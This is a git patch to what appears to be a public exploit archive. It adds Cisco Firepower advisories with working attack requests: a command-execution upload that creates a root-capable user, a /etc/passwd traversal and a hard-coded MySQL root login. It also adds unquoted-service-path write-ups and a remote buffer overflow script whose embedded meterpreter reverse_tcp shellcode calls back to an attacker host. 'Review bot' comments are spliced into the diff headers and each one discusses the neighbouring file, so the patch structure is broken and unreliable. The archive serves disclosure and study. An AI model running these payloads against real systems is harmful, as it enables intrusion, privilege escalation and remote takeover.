From 5fbed830863bba28299473bdded34302b3254cbf Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 6 Oct 2016 05:01:22 +0000 Subject: [PATCH] DB: 2016-10-06 10 new exploits Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials Bind 9 DNS Server - Denial of Service ISC BIND 9 - Denial of Service Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution VX Search Enterprise 9.0.26 - Buffer Overflow Sync Breeze Enterprise 8.9.24 - Buffer Overflow Dup Scout Enterprise 9.0.28 - Buffer Overflow Disk Sorter Enterprise 9.0.24 - Buffer Overflow Disk Savvy Enterprise 9.0.32 - Buffer Overflow Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation --- files.csv | 12 ++- platforms/cgi/webapps/40463.txt | 151 ++++++++++++++++++++++++++++++ platforms/cgi/webapps/40464.txt | 115 +++++++++++++++++++++++ platforms/linux/local/40465.txt | 115 +++++++++++++++++++++++ platforms/windows/local/40460.txt | 46 +++++++++ platforms/windows/local/40461.txt | 47 ++++++++++ platforms/windows/remote/40455.py | 93 ++++++++++++++++++ platforms/windows/remote/40456.py | 93 ++++++++++++++++++ platforms/windows/remote/40457.py | 93 ++++++++++++++++++ platforms/windows/remote/40458.py | 93 ++++++++++++++++++ platforms/windows/remote/40459.py | 93 ++++++++++++++++++ 11 files changed, 950 insertions(+), 1 deletion(-) create mode 100755 platforms/cgi/webapps/40463.txt create mode 100755 platforms/cgi/webapps/40464.txt create mode 100755 platforms/linux/local/40465.txt create mode 100755 platforms/windows/local/40460.txt create mode 100755 platforms/windows/local/40461.txt create mode 100755 platforms/windows/remote/40455.py create mode 100755 platforms/windows/remote/40456.py create mode 100755 platforms/windows/remote/40457.py create mode 100755 platforms/windows/remote/40458.py create mode 100755 platforms/windows/remote/40459.py 
diff --git a/files.csv b/files.csv
index 70cf5f95d..c24279e4f 100755
--- a/files.csv
+++ b/files.csv
@@ -3810,6 +3810,7 @@ id,file,description,date,author,platform,type,port
 4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0
 4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0
 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999
+40465,platforms/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,linux,local,0
 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0
 4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0
 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0
@@ -32999,7 +33000,7 @@ id,file,description,date,author,platform,type,port
 36487,platforms/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0
 36488,platforms/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0
 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0
-40453,platforms/multiple/dos/40453.py,"Bind 9 DNS Server - Denial of Service",2016-10-04,Infobyte,multiple,dos,53
+40453,platforms/multiple/dos/40453.py,"ISC BIND 9 - Denial of Service",2016-10-04,Infobyte,multiple,dos,53
 36490,platforms/php/webapps/36490.py,"WordPress Plugin WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
@@ -36169,6 +36170,7 @@ id,file,description,date,author,platform,type,port
 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39870,platforms/php/webapps/39870.html,"Flatpress 1.0.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-05-31,LiquidWorm,php,webapps,80
 39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
+40464,platforms/cgi/webapps/40464.txt,"Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion",2016-10-05,KoreLogic,cgi,webapps,0
 39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple Vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash (PoC)",2016-05-31,"David Silveiro",linux,dos,0
 39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
@@ -36179,6 +36181,7 @@ id,file,description,date,author,platform,type,port
 39879,platforms/php/webapps/39879.txt,"Joomla! Extension SecurityCheck 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps,0
 39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
+40463,platforms/cgi/webapps/40463.txt,"Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution",2016-10-05,KoreLogic,cgi,webapps,0
 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
 39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",php,webapps,80
 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
@@ -36572,3 +36575,10 @@ id,file,description,date,author,platform,type,port
 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
 40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
+40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
+40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
+40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
+40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
+40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
+40460,platforms/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
+40461,platforms/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
diff --git a/platforms/cgi/webapps/40463.txt b/platforms/cgi/webapps/40463.txt
new file mode 100755
index 000000000..b9f866ae6
--- /dev/null
+++ b/platforms/cgi/webapps/40463.txt
@@ -0,0 +1,151 @@
+KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command
+Execution Leading to Root Access
+
+Title: Cisco Firepower Threat Management Console Remote Command Execution
+Leading to Root Access
+Advisory ID: KL-001-2016-007
+Publication Date: 2016.10.05
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt
+
+
+1. Vulnerability Details
+
+ Affected Vendor: Cisco
+ Affected Product: Firepower Threat Management Console
+ Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
+ Platform: Embedded Linux
+ CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous
+ Type, CWE-94: Improper Control of Generation of Code
+ Impact: Arbitrary Code Execution
+ Attack vector: HTTP
+ CVE-ID: CVE-2016-6433
+
+2. Vulnerability Description
+
+ An authenticated user can run arbitrary system commands as
+ the www user which leads to root.
+
+3. Technical Description
+
+ A valid session and CSRF token is required. The webserver runs as
+ a non-root user which is permitted to sudo commands as root with
+ no password.
+
+ POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1
+ Host: 1.3.3.7
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)
+Gecko/20100101 Firefox/45.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ DNT: 1
+ Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6
+ Connection: close
+ Content-Type: multipart/form-data;
+boundary=---------------------------15519792567789791301241925798
+ Content-Length: 813
+
+ -----------------------------15519792567789791301241925798
+ Content-Disposition: form-data; name="manual_update"
+
+ 1
+ -----------------------------15519792567789791301241925798
+ Content-Disposition: form-data; name="source"
+
+ file
+ -----------------------------15519792567789791301241925798
+ Content-Disposition: form-data; name="file";
+filename="Sourcefire_Rule_Update-2016-03-04-001-vrt.sh"
+ Content-Type: application/octet-stream
+
+ sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic
+ -----------------------------15519792567789791301241925798
+ Content-Disposition: form-data; name="action_submit"
+
+ Import
+ -----------------------------15519792567789791301241925798
+ Content-Disposition: form-data; name="sf_action_id"
+
+ 8c6059ae8dbedc089877b16b7be2ae7f
+ -----------------------------15519792567789791301241925798--
+
+
+ HTTP/1.1 200 OK
+ Date: Sat, 23 Apr 2016 13:38:01 GMT
+ Server: Apache
+ Vary: Accept-Encoding
+ X-Frame-Options: SAMEORIGIN
+ Content-Length: 49998
+ Connection: close
+ Content-Type: text/html; charset=utf-8
+
+ ...
+
+ $ ssh korelogic@1.3.3.7
+ Password:
+
+ Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.
+ Cisco is a registered trademark of Cisco Systems, Inc.
+ All other trademarks are property of their respective owners.
+
+ Cisco Fire Linux OS v6.0.1 (build 37)
+ Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)
+
+ Could not chdir to home directory /Volume/home/korelogic: No such file or
+directory
+ korelogic@firepower:/$ sudo su -
+ Password:
+ root@firepower:~#
+
+4. Mitigation and Remediation Recommendation
+
+ The vendor has acknowledged this vulnerability but has
+ not issued a fix. Vendor acknowledgement available at:
+
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc
+
+5. Credit
+
+ This vulnerability was discovered by Matt Bergin (@thatguylevel) of
+KoreLogic, Inc.
+
+6. Disclosure Timeline
+
+ 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
+ 2016.06.30 - Cisco acknowledges receipt of vulnerability report.
+ 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
+ this vulnerability and for 3 others reported in the
+ same product.
+ 2016.08.12 - 30 business days have elapsed since the vulnerability was
+ reported to Cisco.
+ 2016.09.02 - 45 business days have elapsed since the vulnerability was
+ reported to Cisco.
+ 2016.09.09 - KoreLogic asks for an update on the status of the
+ remediation efforts.
+ 2016.09.15 - Cisco confirms remediation is underway and soon to be
+ completed.
+ 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details
+ will be released publicly on 2016.10.05.
+ 2016.10.05 - Public disclosure.
+
+7. Proof of Concept
+
+ See Technical Description
+
+
+The contents of this advisory are copyright(c) 2016
+KoreLogic, Inc. and are licensed under a Creative Commons
+Attribution Share-Alike 4.0 (United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+
+KoreLogic, Inc. is a founder-owned and operated company with a
+proven track record of providing security services to entities
+ranging from Fortune 500 to small and mid-sized companies. We
+are a highly skilled team of senior security consultants doing
+by-hand security assessments for the most important networks in
+the U.S. and around the world. We are also developers of various
+tools and resources aimed at helping the security community.
+https://www.korelogic.com/about-korelogic.html
+
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
\ No newline at end of file
diff --git a/platforms/cgi/webapps/40464.txt b/platforms/cgi/webapps/40464.txt
new file mode 100755
index 000000000..3cef15044
--- /dev/null
+++ b/platforms/cgi/webapps/40464.txt
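Review bot: Section 4 records that no vendor fix exists but gives the reader no interim hardening, even though section 3 already names the condition that turns command execution as the web user into root: the account `is permitted to sudo commands as root with no password`. The mitigation section should state that condition explicitly as the thing to remove or restrict while waiting for a patch, e.g. `Until a vendor fix ships, remove or restrict the passwordless sudo grant for the web server account; sudo invocations by that account are also a useful detection signal.` Section 1 could likewise note that the PoC requires an authenticated session plus a valid CSRF token, since that prerequisite is currently only visible in section 3.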
@@ -0,0 +1,115 @@
+KL-001-2016-006 : Cisco Firepower Threat Management Console Local File Inclusion
+
+Title: Cisco Firepower Threat Management Console Local File Inclusion
+Advisory ID: KL-001-2016-006
+Publication Date: 2016.10.05
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-006.txt
+
+
+1. Vulnerability Details
+
+ Affected Vendor: Cisco
+ Affected Product: Firepower Threat Management Console
+ Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
+ Platform: Embedded Linux
+ CWE Classification: CWE-73: External Control of File Name or Path
+ Impact: Information Disclosure
+ Attack vector: HTTP
+ CVE-ID: CVE-2016-6435
+
+2. Vulnerability Description
+
+ An authenticated user can access arbitrary files on the local system.
+
+3. Technical Description
+
+ Requests that take a file path do not properly filter what files can
+ be requested. The webserver does not run as root, so files such as
+ /etc/shadow are not readable.
+
+ GET /events/reports/view.cgi?download=1&files=../../../etc/passwd%00 HTTP/1.1
+ Host: 1.3.3.7
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)
+Gecko/20100101 Firefox/45.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ DNT: 1
+ Cookie: CGISESSID=2ee7e6f19a104f4453e201f26fdbd6f3
+ Connection: close
+
+ HTTP/1.1 200 OK
+ Date: Fri, 22 Apr 2016 23:58:41 GMT
+ Server: Apache
+ Content-Disposition: attachment; filename=passwd
+ X-Frame-Options: SAMEORIGIN
+ Connection: close
+ Content-Type: application/octet-stream
+ Content-Length: 623
+
+ root:x:0:0:Operator:/root:/bin/sh
+ bin:x:1:1:bin:/bin:/sbin/nologin
+ daemon:x:2:2:daemon:/sbin:/sbin/nologin
+ mysql:x:27:27:MySQL:/var/lib/mysql:/sbin/nologin
+ nobody:x:99:99:nobody:/:/sbin/nologin
+ sshd:x:33:33:sshd:/:/sbin/nologin
+ www:x:67:67:HTTP server:/var/www:/sbin/nologin
+ sfrna:x:88:88:SF RNA User:/Volume/home/sfrna:/sbin/nologin
+ snorty:x:90:90:Snorty User:/Volume/home/snorty:/sbin/nologin
+ sfsnort:x:95:95:SF Snort User:/Volume/home/sfsnort:/sbin/nologin
+ sfremediation:x:103:103::/Volume/home/remediations:/sbin/nologin
+ admin:x:100:100::/Volume/home/admin:/bin/sh
+ casuser:x:101:104:CiscoUser:/var/opt/CSCOpx:/bin/bash
+
+4. Mitigation and Remediation Recommendation
+
+ The vendor has issued a patch for this vulnerability
+ in version 6.1. Vendor acknowledgement available at:
+
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2
+
+5. Credit
+
+ This vulnerability was discovered by Matt Bergin (@thatguylevel)
+ of KoreLogic, Inc.
+
+6. Disclosure Timeline
+
+ 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
+ 2016.06.30 - Cisco acknowledges receipt of vulnerability report.
+ 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
+ this vulnerability and for 3 others reported in the
+ same product.
+ 2016.08.12 - 30 business days have elapsed since the vulnerability was
+ reported to Cisco.
+ 2016.09.02 - 45 business days have elapsed since the vulnerability was
+ reported to Cisco.
+ 2016.09.09 - KoreLogic asks for an update on the status of the
+ remediation efforts.
+ 2016.09.15 - Cisco confirms remediation is underway and soon to be
+ completed.
+ 2016.09.28 - Cisco informs KoreLogic that the remediation details will
+ be released publicly on 2016.10.05.
+ 2016.10.05 - Public disclosure.
+
+7. Proof of Concept
+
+ See Technical Description
+
+
+The contents of this advisory are copyright(c) 2016
+KoreLogic, Inc. and are licensed under a Creative Commons
+Attribution Share-Alike 4.0 (United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+
+KoreLogic, Inc. is a founder-owned and operated company with a
+proven track record of providing security services to entities
+ranging from Fortune 500 to small and mid-sized companies. We
+are a highly skilled team of senior security consultants doing
+by-hand security assessments for the most important networks in
+the U.S. and around the world. We are also developers of various
+tools and resources aimed at helping the security community.
+https://www.korelogic.com/about-korelogic.html
+
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
\ No newline at end of file
diff --git a/platforms/linux/local/40465.txt b/platforms/linux/local/40465.txt
new file mode 100755
index 000000000..52ce79911
--- /dev/null
+++ b/platforms/linux/local/40465.txt
@@ -0,0 +1,115 @@
+KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL
+Credentials
+
+Title: Cisco Firepower Threat Management Console Hard-coded MySQL Credentials
+Advisory ID: KL-001-2016-005
+Publication Date: 2016.10.05
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-005.txt
+
+
+1. Vulnerability Details
+
+ Affected Vendor: Cisco
+ Affected Product: Firepower Threat Management Console
+ Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
+ Platform: Embedded Linux
+ CWE Classification: CWE-798: Use of Hard-coded Credentials
+ Impact: Authentication Bypass
+ CVE-ID: CVE-2016-6434
+
+2. Vulnerability Description
+
+ The root account for the local MySQL database has poor password
+ complexity.
+
+
+3. Technical Description
+
+ root@firepower:/Volume/6.0.1# mysql -u root --password=admin
+ Warning: Using a password on the command line interface can be insecure.
+ Welcome to the MySQL monitor. Commands end with ; or \g.
+ Your MySQL connection id is 23348
+ Server version: 5.6.24-enterprise-commercial-advanced-log MySQL Enterprise
+Server - Advanced Edition (Commercial)
+
+ Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
+
+ Oracle is a registered trademark of Oracle Corporation and/or its
+ affiliates. Other names may be trademarks of their respective
+ owners.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ mysql> show databases;
+ +--------------------+
+ | Database |
+ +--------------------+
+ | information_schema |
+ | Sourcefire |
+ | external_data |
+ | external_schema |
+ | mysql |
+ | performance_schema |
+ | sfsnort |
+ +--------------------+
+ 7 rows in set (0.00 sec)
+
+ mysql>
+
+ Note that mysqld listens only on loopback, so a remote attacker
+ would have to leverage some other condition to be able to reach
+ the mysql daemon.
+
+4. Mitigation and Remediation Recommendation
+
+ The vendor has acknowledged this vulnerability
+ but has not released a fix for the
+ issue. Vendor acknowledgement available at:
+
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc1
+
+5. Credit
+
+ This vulnerability was discovered by Matt Bergin (@thatguylevel)
+ of KoreLogic, Inc.
+
+6. Disclosure Timeline
+
+ 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
+ 2016.06.30 - Cisco acknowledges receipt of vulnerability report.
+ 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for
+ this vulnerability and for 3 others reported in the
+ same product.
+ 2016.08.12 - 30 business days have elapsed since the vulnerability was
+ reported to Cisco.
+ 2016.09.02 - 45 business days have elapsed since the vulnerability was
+ reported to Cisco.
+ 2016.09.09 - KoreLogic asks for an update on the status of the
+ remediation efforts.
+ 2016.09.15 - Cisco confirms remediation is underway and soon to be
+ completed.
+ 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details
+ will be released publicly on 2016.10.05.
+ 2016.10.05 - Public disclosure.
+
+7. Proof of Concept
+
+ See Technical Description
+
+
+The contents of this advisory are copyright(c) 2016
+KoreLogic, Inc. and are licensed under a Creative Commons
+Attribution Share-Alike 4.0 (United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+
+KoreLogic, Inc. is a founder-owned and operated company with a
+proven track record of providing security services to entities
+ranging from Fortune 500 to small and mid-sized companies. We
+are a highly skilled team of senior security consultants doing
+by-hand security assessments for the most important networks in
+the U.S. and around the world. We are also developers of various
+tools and resources aimed at helping the security community.
+https://www.korelogic.com/about-korelogic.html
+
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
\ No newline at end of file
diff --git a/platforms/windows/local/40460.txt b/platforms/windows/local/40460.txt
new file mode 100755
index 000000000..f01276108
--- /dev/null
+++ b/platforms/windows/local/40460.txt
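Review bot: Section 2 of this advisory contradicts its own title and CWE: the title and `CWE-798: Use of Hard-coded Credentials` describe a fixed, shipped credential, while the description only says the MySQL root account `has poor password complexity`, which is a different (and less severe-sounding) finding. Section 3 shows a login with `--password=admin` on a stock build, so the description should say that the local MySQL root password is a fixed, known value rather than merely weak. Section 1 also drops the `Attack vector:` field that the companion advisories KL-001-2016-006 and KL-001-2016-007 carry; given section 3's own note that mysqld listens only on loopback, `Attack vector: Local` would make the exposure clear at a glance, and `Impact: Authentication Bypass` arguably understates that this yields full access to the local databases.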
@@ -0,0 +1,46 @@
+# Exploit Title: Abyss Web Server X1 2.11.1 Multiple Local Privilege Escalation
+# Date: 05/10/2016
+# Exploit Author: Tulpa
+# Contact: tulpa@tulpa-security.com
+# Author website: www.tulpa-security.com
+# Author twitter: @tulpa_security
+# Vendor Homepage: http://aprelium.com/
+# Application Download: http://aprelium.com/abyssws/download.php
+# Version: Software Version 2.11.1
+# Tested on: Windows 7 x86
+# Shout-out to carbonated and ozzie_offsec
+
+1. Description:
+
+Abyss Web Server installs a service called 'AbyssWebServer' with an unquoted service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system. Abyss Web Server also suffers from weak file and folder permissions which could allow
+
+an unauthorized user to swop out executable files with their own payload.
+
+2. Proof
+
+C:\Program Files>sc qc AbyssWebServer
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AbyssWebServer
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Abyss Web Server\abyssws.exe --service
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Abyss Web Server
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+
+A successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
+
+
diff --git a/platforms/windows/local/40461.txt b/platforms/windows/local/40461.txt
new file mode 100755
index 000000000..2b6c179d6
--- /dev/null
+++ b/platforms/windows/local/40461.txt
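Review bot: Section 1 claims Abyss Web Server `also suffers from weak file and folder permissions`, but section 2 only evidences the unquoted `BINARY_PATH_NAME : C:\Abyss Web Server\abyssws.exe --service`; nothing in the proof shows which files or folders a non-privileged user can write to, and section 3 is the generic unquoted-path paragraph that never mentions permissions. The two findings have different fixes (quoting the service path versus tightening the install-directory ACL), so either add the permission listing that supports the claim to section 2 or drop that sentence and the word "Multiple" from the title. A stray blank line also splits the sentence `which could allow` / `an unauthorized user to swop out` in the description.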
@@ -0,0 +1,47 @@
+# Exploit Title: Fortitude HTTP 1.0.4.0 Unquoted Service Path Elevation of Privilege
+# Date: 05/10/2016
+# Exploit Author: Tulpa
+# Contact: tulpa@tulpa-security.com
+# Author website: www.tulpa-security.com
+# Author twitter: @tulpa_security
+# Vendor Homepage: http://www.networkdls.com/
+# Software Link: http://www.networkdls.com/Software/View/Fortitude_HTTP
+# Version: Software Version 1.0.4.0
+# Tested on: Windows 7 x86
+# Shout-out to carbonated and ozzie_offsec
+
+1. Description:
+
+Netgear Genie installs a service called 'Fortitude HTTP' with an unquoted service path
+
+running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+2. Proof
+
+C:\Program Files>sc qc "Fortitude HTTP"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Fortitude HTTP
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NetworkDLS\Fortitude HTTP\Bin
+\FortitudeSvc.exe /RunService
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : NetworkDLS Fortitude HTTP
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+
+A successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
+
+
diff --git a/platforms/windows/remote/40455.py b/platforms/windows/remote/40455.py
new file mode 100755
index 000000000..c9c729f81
--- /dev/null
+++ b/platforms/windows/remote/40455.py
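Review bot: The first sentence of section 1, `Netgear Genie installs a service called 'Fortitude HTTP'`, names the wrong product and reads as a copy-paste leftover from another advisory: the header, the `sc qc "Fortitude HTTP"` output and `DISPLAY_NAME : NetworkDLS Fortitude HTTP` all identify NetworkDLS Fortitude HTTP. It should read `Fortitude HTTP installs a service called 'Fortitude HTTP' with an unquoted service path running with SYSTEM privileges.`, which also removes the stray blank line that currently splits that sentence before `running with SYSTEM privileges.` Section 2's `TYPE : 110 WIN32_OWN_PROCESS (interactive)` is worth a sentence of its own, since an interactive SYSTEM service is a distinct hardening concern from the unquoted path.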
@@ -0,0 +1,93 @@
+#!/usr/bin/python
+
+print "VX Search Enterprise 9.0.26 Buffer Overflow Exploit"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+
+#Exploit will land you NT AUTHORITY\SYSTEM
+#You do not need to be authenticated, password below is garbage
+#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Tested on Windows 7 x86 Enterprise SP1
+
+#Greetings to ozzie_offsec and carbonated
+
+import socket
+import sys
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.123.132',80))
+
+#bad chars \x00\x0a\x0d\x26
+
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+
+#payload size 308
+
+buf = ""
+buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b"
+buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9"
+buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda"
+buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a"
+buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8"
+buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c"
+buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1"
+buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76"
+buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27"
+buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb"
+buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4"
+buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17"
+buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40"
